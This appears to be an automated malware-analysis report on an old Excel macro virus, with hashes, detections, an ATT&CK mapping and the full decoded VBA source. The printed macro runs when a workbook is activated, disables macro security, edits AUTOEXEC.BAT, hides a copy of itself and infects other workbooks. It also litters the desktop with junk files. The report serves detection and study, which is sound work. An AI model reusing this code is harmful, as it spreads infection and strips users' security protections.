Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d4b0759884d6831d…

MALICIOUS

Office (OLE)

20.5 KB Created: 1996-10-14 23:33:28 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 62d253a33dab3595113dc6990a5fef31 SHA-1: 6abbf93650c37ede68980ad6c8e649ce0f8db1aa SHA-256: d4b0759884d6831d5ba25463c0df306ac65c06c5b67da40b719f10550f08b065
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The VBA macro attempts to write to AUTOEXEC.BAT and C:\Windows\Nor.drv, indicating an attempt to modify system files. The macro also attempts to disable security settings and write its own code to a file, suggesting a persistence or execution mechanism. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Xls.Trojan.Feeder-1' further support a malicious classification.

Heuristics 2

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3828 bytes
SHA-256: e6d9559ce6def18a68d9dc26eb24cf0a537926161ee59c63297da0e9a2caf07f
Detection
ClamAV: Xls.Trojan.Feeder-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' MarshYello
Private Sub Workbook_activate()
' Goof By Yello 25/10/00
    On Error Resume Next
        With Application
        .DisplayAlerts = (5 * 2 - 10)
        .Application.ScreenUpdating = (5 * 2 - 10)
        .Application.DisplayStatusBar = (5 * 2 - 10)
    End With
                Open "c:\AUTOEXEC.BAT" For Append As #1
                Print #1, Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(84) & Chr(69) & Chr(77) & Chr(80) & Chr(61) & Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(73) & Chr(78) & Chr(68) & Chr(79) & Chr(87) & Chr(83) & Chr(92) & Chr(68) & Chr(69) & Chr(83) & Chr(75) & Chr(84) & Chr(79) & Chr(80)
                Close #1
                Open "c:\AUTOEXEC.BAT" For Append As #1
                Print #1, Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(84) & Chr(77) & Chr(80) & Chr(61) & Chr(67) & Chr(58) & Chr(92) & Chr(87) & Chr(73) & Chr(78) & Chr(68) & Chr(79) & Chr(87) & Chr(83) & Chr(92) & Chr(68) & Chr(69) & Chr(83) & Chr(75) & Chr(84) & Chr(79) & Chr(80)
                Close #1
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

    Open "C:\Windows\Nor.drv" For Output As #1
    Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 65)
    Close #1
    SetAttr ("C:\Windows\Nor.drv"), 6

    Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
    Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule

    CheckExist = Dir(Application.StartupPath & "\Book1.")
    If CheckExist = "" Then
    VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
    End If

    If ActiveWB.Lines(3, 1) <> "' MarshYello" Then
        ActiveWB.DeleteLines 1, ActiveWB.CountofLines
        ActiveWB.AddFromFile ("C:\Windows\Nor.drv")
        ActiveWorkbook.Save
    End If
trouble1 = Right(Time, 5)
trouble = Left(trouble1, 2)
If trouble >= 45 Then Call MY_Name
End Sub
Private Sub MY_Name()
Count = 0
Do
Randomize
XXXX = Int((9999 * Rnd) + 1)
ZZZZ = Int((5 * Rnd) + 1)
If ZZZZ = 1 Then ZZZZ = Chr(46) & Chr(115) & Chr(104) & Chr(115)
If ZZZZ = 2 Then ZZZZ = Chr(46) & Chr(114) & Chr(97) & Chr(116)
If ZZZZ = 3 Then ZZZZ = Chr(46) & Chr(104) & Chr(108) & Chr(112)
If ZZZZ = 4 Then ZZZZ = Chr(46) & Chr(106) & Chr(115)
If ZZZZ = 5 Then ZZZZ = Chr(46) & Chr(119) & Chr(97) & Chr(118)
Open "c:\windows\desktop\" & XXXX & ZZZZ For Output As #1
Close #1
Count = Count + 1
Loop Until Count = 1000
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True